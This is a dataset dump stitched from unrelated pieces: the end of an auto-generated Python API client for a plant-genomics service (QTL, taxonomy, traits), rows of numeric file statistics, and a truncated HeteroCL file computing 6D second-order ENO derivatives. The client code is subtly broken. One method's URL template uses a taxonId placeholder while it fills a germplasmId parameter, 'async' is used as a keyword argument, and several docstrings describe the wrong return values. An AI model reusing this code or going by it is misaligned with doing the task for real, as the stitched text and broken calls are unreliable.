return self.get_qtl_by_germplasm_trait_with_http_info(germplasm_id, trait_id, **kwargs) # noqa: E501
else:
(data) = self.get_qtl_by_germplasm_trait_with_http_info(germplasm_id, trait_id, **kwargs) # noqa: E501
return data
def get_qtl_by_germplasm_trait_with_http_info(self, germplasm_id, trait_id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_qtl_by_germplasm_trait_with_http_info(germplasm_id, trait_id, async=True)
>>> result = thread.get()
:param async bool
:param str germplasm_id: Unique database ID for the germplasm (required)
:param str trait_id: Unique database ID for the trait in question (required)
:return: list[QTL]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['germplasm_id', 'trait_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_qtl_by_germplasm_trait" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'germplasm_id' is set
if ('germplasm_id' not in params or
params['germplasm_id'] is None):
raise ValueError("Missing the required parameter `germplasm_id` when calling `get_qtl_by_germplasm_trait`") # noqa: E501
# verify the required parameter 'trait_id' is set
if ('trait_id' not in params or
params['trait_id'] is None):
raise ValueError("Missing the required parameter `trait_id` when calling `get_qtl_by_germplasm_trait`") # noqa: E501
collection_formats = {}
path_params = {}
if 'germplasm_id' in params:
path_params['germplasmId'] = params['germplasm_id'] # noqa: E501
if 'trait_id' in params:
path_params['traitId'] = params['trait_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/qtl/taxon/{taxonId}/trait/{traitId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[QTL]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_taxonomy(self, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_taxonomy(async=True)
>>> result = thread.get()
:param async bool
:return: list[Taxonomy]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_taxonomy_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_taxonomy_with_http_info(**kwargs) # noqa: E501
return data
def get_taxonomy_with_http_info(self, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_taxonomy_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[Taxonomy]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_taxonomy" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/taxon/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Taxonomy]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_taxonomy_by_id(self, id, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_taxonomy_by_id(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the taxonomy (required)
:return: Taxonomy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_taxonomy_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_taxonomy_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_taxonomy_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_taxonomy_by_id_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the taxonomy (required)
:return: Taxonomy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_taxonomy_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_taxonomy_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/taxon/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Taxonomy', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_traits(self, **kwargs): # noqa: E501
"""Returns all phenotypes we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_traits(async=True)
>>> result = thread.get()
:param async bool
:return: list[Phenotype]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_traits_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_traits_with_http_info(**kwargs) # noqa: E501
return data
def get_traits_with_http_info(self, **kwargs): # noqa: E501
"""Returns all phenotypes we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_traits_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[Phenotype]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_traits" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/trait/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Phenotype]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_traits_by_germplasm(self, germplasm_id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_traits_by_germplasm(germplasm_id, async=True)
>>> result = thread.get()
:param async bool
:param str germplasm_id: Unique database ID for the germplasm (required)
:return: list[Phenotype]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_traits_by_germplasm_with_http_info(germplasm_id, **kwargs) # noqa: E501
else:
(data) = self.get_traits_by_germplasm_with_http_info(germplasm_id, **kwargs) # noqa: E501
return data
def get_traits_by_germplasm_with_http_info(self, germplasm_id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_traits_by_germplasm_with_http_info(germplasm_id, async=True)
>>> result = thread.get()
:param async bool
:param str germplasm_id: Unique database ID for the germplasm (required)
:return: list[Phenotype]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['germplasm_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_traits_by_germplasm" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'germplasm_id' is set
if ('germplasm_id' not in params or
params['germplasm_id'] is None):
raise ValueError("Missing the required parameter `germplasm_id` when calling `get_traits_by_germplasm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'germplasm_id' in params:
path_params['germplasmId'] = params['germplasm_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/trait/germplasm/{germplasmId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Phenotype]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 36.860735
| 133
| 0.594558
| 4,398
| 38,114
| 4.90291
| 0.040928
| 0.047118
| 0.028567
| 0.03673
| 0.968743
| 0.964801
| 0.96276
| 0.95803
| 0.952233
| 0.946714
| 0
| 0.014927
| 0.314478
| 38,114
| 1,033
| 134
| 36.896418
| 0.810357
| 0.053996
| 0
| 0.814488
| 0
| 0
| 0.161395
| 0.04198
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007067
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12ea3249a0962731f4a9cdce4b003e6bbe81d62b
| 30,158
|
py
|
Python
|
spatialDerivatives/second_orderENO6D.py
|
kensukenk/optimized_dp
|
4771787366ca04139c168c8988dad378ad404ab6
|
[
"MIT"
] | 41
|
2020-06-23T01:58:03.000Z
|
2022-03-28T01:45:12.000Z
|
spatialDerivatives/second_orderENO6D.py
|
kensukenk/optimized_dp
|
4771787366ca04139c168c8988dad378ad404ab6
|
[
"MIT"
] | 1
|
2021-08-01T06:58:57.000Z
|
2021-08-01T06:58:57.000Z
|
spatialDerivatives/second_orderENO6D.py
|
kensukenk/optimized_dp
|
4771787366ca04139c168c8988dad378ad404ab6
|
[
"MIT"
] | 20
|
2020-06-05T20:52:02.000Z
|
2022-03-01T03:17:39.000Z
|
import heterocl as hcl
from computeGraphs.CustomGraphFunctions import *
############################## 6D DERIVATIVE FUNCTIONS #############################
def secondOrderX6_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
left_deriv = hcl.scalar(0, "left_deriv")
right_deriv = hcl.scalar(0, "right_deriv")
dim_idx = 5
u_i = V[i, j, k, l, m, n]
with hcl.if_(n == 0):
u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
u_i_plus_1 = V[i, j, k, l, m, n + 1]
u_i_plus_2 = V[i, j, k, l, m, n + 2]
u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(n == V.shape[dim_idx] - 1):
u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_minus_1 = V[i, j, k, l, m, n - 1]
u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(n == V.shape[dim_idx] - 2):
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_plus_1 = V[i, j, k, l, m, n + 1]
u_i_minus_1 = V[i, j, k, l, m, n - 1]
u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
u_i_minus_1 = V[i, j, k, l, m, n - 1]
u_i_plus_1 = V[i, j, k, l, m, n + 1]
u_i_plus_2 = V[i, j, k, l, m, n + 2]
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
return left_deriv[0], right_deriv[0]
def secondOrderX5_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
left_deriv = hcl.scalar(0, "left_deriv")
right_deriv = hcl.scalar(0, "right_deriv")
dim_idx = 4
u_i = V[i, j, k, l, m, n]
with hcl.if_(m == 0):
u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
u_i_plus_1 = V[i, j, k, l, m + 1, n]
u_i_plus_2 = V[i, j, k, l, m + 2, n]
u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(m == V.shape[dim_idx] - 1):
u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_minus_1 = V[i, j, k, l, m - 1, n]
u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(m == V.shape[dim_idx] - 2):
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_plus_1 = V[i, j, k, l, m + 1, n]
u_i_minus_1 = V[i, j, k, l, m - 1, n]
u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
u_i_minus_1 = V[i, j, k, l, m - 1, n]
u_i_plus_1 = V[i, j, k, l, m + 1, n]
u_i_plus_2 = V[i, j, k, l, m + 2, n]
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
return left_deriv[0], right_deriv[0]
def secondOrderX4_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
left_deriv = hcl.scalar(0, "left_deriv")
right_deriv = hcl.scalar(0, "right_deriv")
dim_idx = 3
u_i = V[i, j, k, l, m, n]
with hcl.if_(l == 0):
u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
u_i_plus_1 = V[i, j, k, l + 1, m, n]
u_i_plus_2 = V[i, j, k, l + 2, m, n]
u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(l == V.shape[dim_idx] - 1):
u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_minus_1 = V[i, j, k, l - 1, m, n]
u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(l == V.shape[dim_idx] - 2):
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_plus_1 = V[i, j, k, l + 1, m, n]
u_i_minus_1 = V[i, j, k, l - 1, m, n]
u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
u_i_minus_1 = V[i, j, k, l - 1, m, n]
u_i_plus_1 = V[i, j, k, l + 1, m, n]
u_i_plus_2 = V[i, j, k, l + 2, m, n]
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
return left_deriv[0], right_deriv[0]
def secondOrderX3_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
left_deriv = hcl.scalar(0, "left_deriv")
right_deriv = hcl.scalar(0, "right_deriv")
dim_idx = 2
u_i = V[i, j, k, l, m, n]
with hcl.if_(k == 0):
u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
u_i_plus_1 = V[i, j, k + 1, l, m, n]
u_i_plus_2 = V[i, j, k + 2, l, m, n]
u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
